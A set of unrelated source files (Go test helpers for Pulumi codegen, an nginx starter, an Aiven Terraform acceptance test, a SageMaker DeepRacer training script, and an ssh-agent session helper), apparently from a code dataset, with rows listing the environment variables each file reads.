t.Logf("File %s from the actual fileset was not expected", name)
ok = false
}
}
return ok
}
// If PULUMI_ACCEPT is set, writes out actual output to the expected
// file set, so we can continue enjoying golden tests without manually
// modifying the expected output.
func RewriteFilesWhenPulumiAccept(t *testing.T, dir, lang string, actual map[string][]byte) bool {
if os.Getenv("PULUMI_ACCEPT") == "" {
return false
}
cm := &codegenManifest{}
baseline := filepath.Join(dir, lang)
// Remove the baseline directory's current contents.
_, err := os.ReadDir(baseline)
switch {
case err == nil:
err = os.RemoveAll(baseline)
require.NoError(t, err)
case os.IsNotExist(err):
// OK
default:
require.NoError(t, err)
}
for file, bytes := range actual {
relPath := filepath.FromSlash(file)
path := filepath.Join(dir, lang, relPath)
cm.EmittedFiles = append(cm.EmittedFiles, relPath)
err := writeFileEnsuringDir(path, bytes)
require.NoError(t, err)
}
err = cm.save(filepath.Join(dir, lang))
require.NoError(t, err)
return true
}
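// Typical (assumed) workflow for refreshing the golden files:
//
//	PULUMI_ACCEPT=true go test ./...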
// Useful for populating code-generated destination
// `codeDir=$dir/$lang` with extra manually written files such as the
// unit test files. These files are copied from `$dir/$lang-extras`
// folder if present.
func CopyExtraFiles(t *testing.T, dir, lang string) {
codeDir := filepath.Join(dir, lang)
extrasDir := filepath.Join(dir, fmt.Sprintf("%s-extras", lang))
gotExtras, err := PathExists(extrasDir)
if !gotExtras {
return
}
if err != nil {
require.NoError(t, err)
return
}
err = filepath.Walk(extrasDir, func(path string, info os.FileInfo, err error) error {
if err != nil {
return err
}
if info.IsDir() {
return nil
}
relPath, err := filepath.Rel(extrasDir, path)
if err != nil {
return err
}
destPath := filepath.Join(codeDir, relPath)
bytes, err := ioutil.ReadFile(path)
if err != nil {
return err
}
err = writeFileEnsuringDir(destPath, bytes)
if err != nil {
return err
}
t.Logf("Copied %s to %s", path, destPath)
return nil
})
require.NoError(t, err)
}
func writeFileEnsuringDir(path string, bytes []byte) error {
if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil && !os.IsExist(err) {
return err
}
return ioutil.WriteFile(path, bytes, 0600)
}
// CheckAllFilesGenerated ensures that the set of expected and actual files generated
// are exactly equivalent.
func CheckAllFilesGenerated(t *testing.T, actual, expected map[string][]byte) {
seen := map[string]bool{}
for x := range expected {
seen[x] = true
}
for a := range actual {
assert.Contains(t, seen, a, "Unexpected file generated: %s", a)
if seen[a] {
delete(seen, a)
}
}
for s := range seen {
assert.Fail(t, "No content generated for expected file %s", s)
}
}
// Validates a transformer on a single file.
func ValidateFileTransformer(
t *testing.T,
inputFile string,
expectedOutputFile string,
transformer func(reader io.Reader, writer io.Writer) error) {
reader, err := os.Open(inputFile)
if err != nil {
t.Error(err)
return
}
var buf bytes.Buffer
err = transformer(reader, &buf)
if err != nil {
t.Error(err)
return
}
actualBytes := buf.Bytes()
if os.Getenv("PULUMI_ACCEPT") != "" {
err := ioutil.WriteFile(expectedOutputFile, actualBytes, 0600)
if err != nil {
t.Error(err)
return
}
}
actual := map[string][]byte{expectedOutputFile: actualBytes}
expectedBytes, err := ioutil.ReadFile(expectedOutputFile)
if err != nil {
t.Error(err)
return
}
expected := map[string][]byte{expectedOutputFile: expectedBytes}
ValidateFileEquality(t, actual, expected)
}
func RunCommand(t *testing.T, name string, cwd string, exec string, args ...string) {
RunCommandWithOptions(t, &integration.ProgramTestOptions{}, name, cwd, exec, args...)
}
func RunCommandWithOptions(
t *testing.T,
opts *integration.ProgramTestOptions,
name string, cwd string, exec string, args ...string) {
exec, err := executable.FindExecutable(exec)
if err != nil {
t.Error(err)
t.FailNow()
}
wd, err := filepath.Abs(cwd)
require.NoError(t, err)
var stdout, stderr bytes.Buffer
opts.Stdout = &stdout
opts.Stderr = &stderr
opts.Verbose = true
err = integration.RunCommand(t,
name,
append([]string{exec}, args...),
wd,
opts)
if !assert.NoError(t, err) {
stdout := stdout.String()
stderr := stderr.String()
if len(stdout) > 0 {
t.Logf("stdout: %s", stdout)
}
if len(stderr) > 0 {
t.Logf("stderr: %s", stderr)
}
t.FailNow()
}
}
type SchemaVersion = string
const (
AwsSchema SchemaVersion = "4.26.0"
AzureNativeSchema SchemaVersion = "1.29.0"
AzureSchema SchemaVersion = "4.18.0"
KubernetesSchema SchemaVersion = "3.7.2"
RandomSchema SchemaVersion = "4.2.0"
)
var schemaVersions = map[string]struct {
version SchemaVersion
url string
}{
"aws.json": {
version: AwsSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-aws/v%s/provider/cmd/pulumi-resource-aws/schema.json", //nolint:lll
},
"azure.json": {
version: AzureSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-azure/v%s/provider/cmd/pulumi-resource-azure/schema.json",
},
"azure-native.json": {
version: AzureNativeSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-azure-native/v%s/provider/cmd/pulumi-resource-azure-native/schema.json", //nolint:lll
},
"kubernetes.json": {
version: KubernetesSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-kubernetes/v%s/provider/cmd/pulumi-resource-kubernetes/schema.json", //nolint:lll
},
"random.json": {
version: RandomSchema,
url: "https://raw.githubusercontent.com/pulumi/pulumi-random/v%s/provider/cmd/pulumi-resource-random/schema.json",
},
}
// ensureValidSchemaVersions ensures that we have downloaded valid schema for
// the tests. If it does not find such schema, or the schema found have the
// wrong version, the function downloads correct schema.
func ensureValidSchemaVersions(t *testing.T) {
c := make(chan error)
updates := 0
for k, v := range schemaVersions {
path := filepath.Join("..", "internal", "test", "testdata", k)
current, err := currentVersion(path)
var isJSONSyntaxError bool
if err != nil {
_, isJSONSyntaxError = err.(*json.SyntaxError)
}
if os.IsNotExist(err) || isJSONSyntaxError || (err == nil && current != v.version) {
t.Logf("Updating %s from %s to %s", k, current, v.version)
updates++
go replaceSchema(c, path, v.version, v.url)
} else if err != nil {
t.Errorf("failed to get schema version: %s", err)
}
}
var err error
for i := 0; i < updates; i++ {
err = <-c
if err != nil {
t.Errorf("failed to update schema: %s", err)
}
}
if err != nil {
t.FailNow()
}
}
// Reads the current version of the installed package schema
func currentVersion(path string) (string, error) {
str, err := ioutil.ReadFile(path)
if err != nil {
return "", err
}
var data interface{}
err = json.Unmarshal(str, &data)
if err != nil {
return "", err
}
json, ok := data.(map[string]interface{})
if !ok {
return "", fmt.Errorf("%s could not be read", path)
}
version, ok := json["version"]
if !ok {
return "", errors.New("Could not find version field")
}
versionString, ok := version.(string)
if !ok {
return "", errors.New("version value is not a string")
}
return versionString, nil
}
// Replaces the installed package schema with one containing the correct version.
func replaceSchema(c chan error, path, version, url string) {
// This is safe because url is always a reference to a page Pulumi
// controls in github.
resp, err := http.Get(fmt.Sprintf(url, version)) //nolint:gosec
if err != nil {
c <- err
return
}
defer resp.Body.Close()
err = os.Remove(path)
if !os.IsNotExist(err) && err != nil {
c <- fmt.Errorf("failed to replace schema: %w", err)
return
}
schemaFile, err := os.Create(path)
if err != nil {
c <- err
return
}
defer schemaFile.Close()
var schemaRaw interface{}
decoder := json.NewDecoder(resp.Body)
err = decoder.Decode(&schemaRaw)
if err != nil {
c <- err
return
}
schema, ok := schemaRaw.(map[string]interface{})
if !ok {
c <- errors.New("failed to convert schema to map")
return
}
schema["version"] = version
encoded, err := json.MarshalIndent(schema, "", " ")
if err != nil {
c <- err
return
}
written, err := schemaFile.Write(encoded)
if err != nil {
c <- err
} else if written != len(encoded) {
c <- errors.New("failed to write full message")
} else {
c <- nil
}
}
| [
"\"PULUMI_ACCEPT\"",
"\"PULUMI_ACCEPT\""
] | [] | [
"PULUMI_ACCEPT"
] | [] | ["PULUMI_ACCEPT"] | go | 1 | 0 | |
new/bases/service/nginx/nginx-start.go | package main
import (
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"os/signal"
"path/filepath"
"strings"
"syscall"
"text/template"
"time"
"github.com/fatih/color"
)
func main() {
port := os.Getenv("ProPORT")
if port == "" {
port = "8000"
}
addr := ":" + port
process := startNginx(port)
log.Printf("starting.(%s)", addr)
waitPortReady(process.Pid, addr)
log.Println(color.GreenString("frontend started. (%s)", addr))
// SIGUSR1 for log reopen
c := make(chan os.Signal, 1)
signal.Notify(c, syscall.SIGUSR1, syscall.SIGQUIT, syscall.SIGTERM, syscall.SIGINT)
for {
if err := process.Signal(<-c); err != nil {
log.Println(err)
}
}
}
func startNginx(port string) *os.Process {
generateConf(port)
cmd := exec.Command("nginx")
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
if err := cmd.Start(); err != nil {
log.Fatal(err)
}
go func() {
if err := cmd.Wait(); err != nil {
log.Fatal(err)
} else {
log.Println("shutdown")
os.Exit(0)
}
}()
return cmd.Process
}
func generateConf(port string) {
config := struct {
ListenPort string
SendfileOff bool
}{
ListenPort: port,
SendfileOff: os.Getenv("SendfileOff") == "true",
}
tmplFiles, err := filepath.Glob("/etc/nginx/sites-available/*.conf.tmpl")
if err != nil {
log.Panic(err)
}
for _, tmplFile := range tmplFiles {
var buf bytes.Buffer
if err := template.Must(template.ParseFiles(tmplFile)).Execute(&buf, config); err != nil {
log.Panic(err)
}
confFile := `/etc/nginx/sites-enabled/` + strings.TrimSuffix(filepath.Base(tmplFile), `.tmpl`)
if err := ioutil.WriteFile(confFile, buf.Bytes(), 0644); err != nil {
log.Panic(err)
}
}
}
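// A sites-available template consumed above might look like (hypothetical
// default.conf.tmpl):
//
//	server {
//	    listen {{.ListenPort}};
//	    {{if .SendfileOff}}sendfile off;{{end}}
//	}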
func waitPortReady(pid int, addr string) {
for i := 0; i < 7; i++ {
cmd := exec.Command("lsof", "-aP", "-i"+addr, "-stcp:listen")
cmd.Stderr = os.Stderr
out, err := cmd.Output()
if err != nil {
log.Fatal(err)
}
if len(out) > 0 {
fmt.Print(string(out))
return
}
time.Sleep(time.Second)
}
log.Printf("waitPortReady timeout(%s)\n", addr)
os.Exit(1)
}
| [
"\"ProPORT\"",
"\"SendfileOff\""
] | [] | [
"ProPORT",
"SendfileOff"
] | [] | ["ProPORT", "SendfileOff"] | go | 2 | 0 | |
aiven/resource_connection_pool_test.go | package aiven
import (
"fmt"
"os"
"testing"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
func init() {
resource.AddTestSweepers("aiven_connection_pool", &resource.Sweeper{
Name: "aiven_connection_pool",
F: sweepConnectionPools,
})
}
func sweepConnectionPools(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
list, err := conn.ConnectionPools.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 {
continue
}
return fmt.Errorf("error retrieving a list of connection pools for a service `%s`: %s", service.Name, err)
}
for _, pool := range list {
err = conn.ConnectionPools.Delete(project.Name, service.Name, pool.PoolName)
if err != nil {
return fmt.Errorf("error destroying connection pool `%s` during sweep: %s", pool.PoolName, err)
}
}
}
}
}
return nil
}
func TestAccAivenConnectionPool_basic(t *testing.T) {
resourceName := "aiven_connection_pool.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
rName2 := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenConnectionPoolResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccConnectionPoolResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenConnectionPoolAttributes("data.aiven_connection_pool.pool"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "username", fmt.Sprintf("user-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
{
Config: testAccConnectionPoolNoUserResource(rName2),
Check: resource.ComposeTestCheckFunc(
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName2)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
},
})
}
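// Running this acceptance test assumes AIVEN_PROJECT_NAME (plus the usual Aiven
// credentials checked by testAccPreCheck) is set, e.g. (illustrative):
//
//	AIVEN_PROJECT_NAME=my-project TF_ACC=1 go test -run TestAccAivenConnectionPool_basic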
func testAccConnectionPoolNoUserResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_pg" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
}
resource "aiven_database" "foo" {
project = aiven_pg.bar.project
service_name = aiven_pg.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
depends_on = [aiven_database.foo]
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name)
}
func testAccConnectionPoolResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_pg" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
}
resource "aiven_service_user" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
username = "user-%s"
}
resource "aiven_database" "foo" {
project = aiven_pg.bar.project
service_name = aiven_pg.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_pg.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
username = aiven_service_user.foo.username
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
depends_on = [aiven_database.foo]
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name, name)
}
func testAccCheckAivenConnectionPoolAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["pool_name"] == "" {
return fmt.Errorf("expected to get a pool_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["username"] == "" {
return fmt.Errorf("expected to get a username from Aiven")
}
if a["pool_size"] != "25" {
return fmt.Errorf("expected to get a correct pool_size from Aiven")
}
if a["pool_mode"] != "transaction" {
return fmt.Errorf("expected to get a correct pool_mode from Aiven")
}
return nil
}
}
func testAccCheckAivenConnectionPoolResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each connection pool is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_connection_pool" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
pool, err := c.ConnectionPools.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if pool != nil {
return fmt.Errorf("connection pool (%s) still exists", rs.Primary.ID)
}
}
return nil
}
| [
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
] | [] | [
"AIVEN_PROJECT_NAME"
] | [] | ["AIVEN_PROJECT_NAME"] | go | 1 | 0 | |
rl_coach/rl_deepracer_coach_robomaker.py | #!/usr/bin/env python
# coding: utf-8
import sagemaker
import boto3
import sys
import os
import glob
import re
import subprocess
from IPython.display import Markdown
from time import gmtime, strftime
sys.path.append("common")
from misc import get_execution_role, wait_for_s3_object
from sagemaker.rl import RLEstimator, RLToolkit, RLFramework
from markdown_helper import *
# S3 bucket
boto_session = boto3.session.Session(
aws_access_key_id=os.environ.get("AWS_ACCESS_KEY_ID", "minio"),
aws_secret_access_key=os.environ.get("AWS_SECRET_ACCESS_KEY", "miniokey"),
region_name=os.environ.get("AWS_REGION", "us-east-1"))
s3Client = boto_session.resource("s3", use_ssl=False,
endpoint_url=os.environ.get("S3_ENDPOINT_URL", "http://127.0.0.1:9000"))
sage_session = sagemaker.local.LocalSession(boto_session=boto_session, s3_client=s3Client)
s3_bucket = os.environ.get("MODEL_S3_BUCKET", "bucket") #sage_session.default_bucket()
s3_output_path = 's3://{}/'.format(s3_bucket) # SDK appends the job name and output folder
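# Illustrative local-mode environment matching the defaults above (values are
# placeholders):
#   export AWS_ACCESS_KEY_ID=minio AWS_SECRET_ACCESS_KEY=miniokey
#   export S3_ENDPOINT_URL=http://127.0.0.1:9000 MODEL_S3_BUCKET=bucket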
# ### Define Variables
# We define variables such as the job prefix for the training jobs and s3_prefix for storing metadata required for synchronization between the training and simulation jobs
job_name_prefix = 'rl-deepracer' # this should be MODEL_S3_PREFIX, but that already ends with "-sagemaker"
# create unique job name
tm = gmtime()
job_name = s3_prefix = job_name_prefix + "-sagemaker"  # optionally suffix with strftime("%y%m%d-%H%M%S", tm); ensure the S3 prefix contains the keyword 'sagemaker'
s3_prefix_robomaker = job_name_prefix + "-robomaker"  # optionally suffix with strftime("%y%m%d-%H%M%S", tm); ensure the S3 prefix contains the keyword 'robomaker'
# Duration of job in seconds (24 hours)
job_duration_in_seconds = 24 * 60 * 60
aws_region = sage_session.boto_region_name
if aws_region not in ["us-west-2", "us-east-1", "eu-west-1"]:
raise Exception("This notebook uses RoboMaker which is available only in US East (N. Virginia), US West (Oregon) and EU (Ireland). Please switch to one of these regions.")
print("Model checkpoints and other metadata will be stored at: {}{}".format(s3_output_path, job_name))
s3_location = "s3://%s/%s" % (s3_bucket, s3_prefix)
print("Uploading to " + s3_location)
metric_definitions = [
# Training> Name=main_level/agent, Worker=0, Episode=19, Total reward=-102.88, Steps=19019, Training iteration=1
{'Name': 'reward-training',
'Regex': '^Training>.*Total reward=(.*?),'},
# Policy training> Surrogate loss=-0.32664725184440613, KL divergence=7.255815035023261e-06, Entropy=2.83156156539917, training epoch=0, learning_rate=0.00025
{'Name': 'ppo-surrogate-loss',
'Regex': '^Policy training>.*Surrogate loss=(.*?),'},
{'Name': 'ppo-entropy',
'Regex': '^Policy training>.*Entropy=(.*?),'},
# Testing> Name=main_level/agent, Worker=0, Episode=19, Total reward=1359.12, Steps=20015, Training iteration=2
{'Name': 'reward-testing',
'Regex': '^Testing>.*Total reward=(.*?),'},
]
# We use the RLEstimator for training RL jobs.
#
# 1. Specify the source directory which has the environment file, preset and training code.
# 2. Specify the entry point as the training code
# 3. Specify the choice of RL toolkit and framework. This automatically resolves to the ECR path for the RL Container.
# 4. Define the training parameters such as the instance count, instance type, job name, s3_bucket and s3_prefix for storing model checkpoints and metadata. **Only 1 training instance is supported for now.**
# 4. Set the RLCOACH_PRESET as "deepracer" for this example.
# 5. Define the metrics definitions that you are interested in capturing in your logs. These can also be visualized in CloudWatch and SageMaker Notebooks.
# In[ ]:
RLCOACH_PRESET = "deepracer"
# 'local' for cpu, 'local_gpu' for nvidia gpu (and then you don't have to set default runtime to nvidia)
instance_type = "local"
estimator = RLEstimator(entry_point="training_worker.py",
source_dir='src',
dependencies=["common/sagemaker_rl"],
toolkit=RLToolkit.COACH,
toolkit_version='0.11',
framework=RLFramework.TENSORFLOW,
sagemaker_session=sage_session,
#bypass sagemaker SDK validation of the role
role="aaa/",
train_instance_type=instance_type,
train_instance_count=1,
output_path=s3_output_path,
base_job_name=job_name_prefix,
image_name="crr0004/sagemaker-rl-tensorflow:console",
train_max_run=job_duration_in_seconds, # Maximum runtime in seconds
hyperparameters={"s3_bucket": s3_bucket,
"s3_prefix": s3_prefix,
"aws_region": aws_region,
"model_metadata_s3_key": "s3://{}/custom_files/model_metadata.json".format(s3_bucket),
"RLCOACH_PRESET": RLCOACH_PRESET,
#"pretrained_s3_bucket": "{}".format(s3_bucket),
#"pretrained_s3_prefix": "rl-deepracer-pretrained"
"loss_type": "mean squared error",
# "batch_size": 64,
# "num_epochs": 10,
# "beta_entropy": 0.01,
# "lr": 0.0003,
# "num_episodes_between_training": 20,
# "discount_factor": 0.999
},
metric_definitions = metric_definitions,
s3_client=s3Client
#subnets=default_subnets, # Required for VPC mode
#security_group_ids=default_security_groups, # Required for VPC mode
)
estimator.fit(job_name=job_name, wait=False)
| [] | [] | [
"MODEL_S3_BUCKET",
"AWS_SECRET_ACCESS_KEY",
"AWS_REGION",
"S3_ENDPOINT_URL",
"AWS_ACCESS_KEY_ID"
] | [] | ["MODEL_S3_BUCKET", "AWS_SECRET_ACCESS_KEY", "AWS_REGION", "S3_ENDPOINT_URL", "AWS_ACCESS_KEY_ID"] | python | 5 | 0 | |
tools/sshsession.py | #!/usr/bin/env python3
"""
Usage:
sshsession.py [options] [SSHKEY...]
options:
-h, --help Show this screen and exit.
"""
import os
import re
import subprocess
import sys
import logging

# Configure a handler so that logger.info() messages are actually emitted;
# without basicConfig, only WARNING and above reach the last-resort handler.
logging.basicConfig(level=logging.INFO, format="%(message)s")
logger = logging.getLogger(__name__)
from pathlib import Path
from docopt import docopt
# TODO check ssh path exists
# TODO add unit tests
# TODO add bash prompt coloring
# Update PS1 command use output from PROMPT_COMMAND
# TODO does not work after current bash rework
# Fri Apr 12 01:39:15 CEST 2019
used_keys = []
def main():
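    """Entry point: add the requested SSH keys to the agent (or choose one
    interactively), then drop into a labelled bash subshell."""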
    # Parse command line options with docopt.
    opt = docopt(__doc__, sys.argv[1:])
    home = os.environ["HOME"]
    ssh_path = Path(home, ".ssh")
    success = False
    ssh_keys = opt.get("SSHKEY", [])
    if len(ssh_keys) == 0:
        success = run_interactive(ssh_path)
    else:
        success = run_non_interactive(ssh_path, ssh_keys)
if success:
print()
run_sshsession()
else:
logger.info("Failed sshsession.")
sys.exit(1)
def run_sshsession(custom_prompt=True):
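    """Spawn an interactive bash subshell whose prompt lists the SSH keys
    loaded in this session.

    Note: the custom prompt relies on a user-defined
    __set_custom_bash_prompt shell function (see the TODO above)."""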
    import tempfile
    global used_keys
    with tempfile.NamedTemporaryFile(delete=True) as f:
        prompt = ""
        if custom_prompt:
            # Raw strings keep the bash escapes (\[ \] \033) intact for PS1.
            COLOR = r"\[\033[0;33m\]"
            COLOR_NONE = r"\[\033[0m\]"
            prompt = r"""
PS1="({1}SSHSESSION{2} {0})
$(__set_custom_bash_prompt $? "\u" '@\h#\W]$ ')"
""".format(", ".join(used_keys), COLOR, COLOR_NONE)
        bash_cmd = r"""
source ~/.bashrc
{0}
""".format(prompt)
        with open(f.name, "w") as fo:
            fo.write(bash_cmd)
        command = [
            "/usr/bin/bash",
            "--rcfile",
            f.name,
        ]
        subprocess.call(command)
def run_non_interactive(path, ssh_keys):
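    """Add every key named on the command line to the ssh-agent.

    Returns True if at least one key was added successfully."""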
    global used_keys
    added_once = False
    for ssh_key in ssh_keys:
        key_path = path.joinpath(ssh_key)
        proc = add_ssh_key(key_path)
        # Only record keys that ssh-add actually accepted.
        if proc is not None and proc.returncode == 0:
            used_keys.append(os.path.basename(str(key_path)))
            added_once = True
    return added_once
def run_interactive(path):
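    """List the private keys found in `path` and let the user pick one.

    Returns True if the chosen key was added to the agent."""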
    global used_keys
    cwd = os.getcwd()
    os.chdir(str(path))
    ids = get_ids(os.listdir("."))
    os.chdir(cwd)
    ids = sorted(ids)
    menu = create_interactive_menu(ids)
    while True:
        print(menu)
        choice = interactive_input(ids)
        if choice is not None:
            key = ids[choice]
            proc = add_ssh_key(path.joinpath(key))
            if proc is not None and proc.returncode == 0:
                used_keys.append(os.path.basename(str(key)))
                return True
            return False
        logger.info("Invalid choice")
def interactive_input(ids):
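    """Read a 1-based menu selection; return the 0-based index, or None if
    the input is not a number or is out of range."""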
try:
choice = input("Your choice: ")
choice = int(choice) - 1
except ValueError:
return None
except (KeyboardInterrupt, EOFError):
logger.error("bye")
sys.exit(0)
if is_in_bounds(choice, ids):
return choice
else:
return None
def get_ids(items):
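    """Filter `items` down to private key files, using the file(1) command.

    Note: this only recognizes keys that file(1) reports as
    "PEM RSA private key"; newer OpenSSH-format keys are reported
    differently and will not be listed."""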
    ids = []
    valid_keyfiletype = "PEM RSA private key"
    for item in items:
        command = ["file", item]
        result = subprocess.run(command,
                                stderr=subprocess.DEVNULL,
                                stdout=subprocess.PIPE)
        # `file` prints "<name>: <type>"; split only on the first colon in
        # case the file name itself contains one.
        output = result.stdout.decode("UTF-8").split(":", 1)
        if len(output) != 2:
            continue
        filetype = output[1].strip()
        if filetype == valid_keyfiletype:
            ids.append(item)
    return ids
def is_in_bounds(choice, items):
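    """Return True if `choice` is a valid index into `items`."""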
    return 0 <= choice < len(items)
def create_interactive_menu(ids):
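    """Build the numbered key-selection menu as a single string."""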
output = "{:#^40}".format("Available ssh ids")
output += "\nSelect an id:"
    for nr, key in enumerate(ids, 1):
output += "\n {}\t{}".format(nr,key)
return output
def add_ssh_key(key):
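    """Run ssh-add for `key`; return the CompletedProcess, or None if the
    key file does not exist."""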
    if not key.is_file():
        logger.info("Key {} does not exist.".format(str(key)))
        return None
    # Strip away .pub so ssh-add is handed the private key file.
    key = remove_suffix(str(key), ".pub")
    return subprocess.run(["/usr/bin/ssh-add", key])
def remove_suffix(string, suffix):
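    """Return `string` with a trailing `suffix` removed, if present."""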
    if not string.endswith(suffix):
        return string
    # Slice from the end; find() would match an earlier occurrence of suffix.
    return string[: -len(suffix)]
if __name__ == "__main__":
    if os.name != "posix":
logger.info("OS not supported.")
sys.exit(1)
try:
main()
except KeyboardInterrupt:
logger.error("\nbye")
sys.exit(0)
################################################################################
# Tests
| [] | [] | [
"HOME"
] | [] | ["HOME"] | python | 1 | 0 |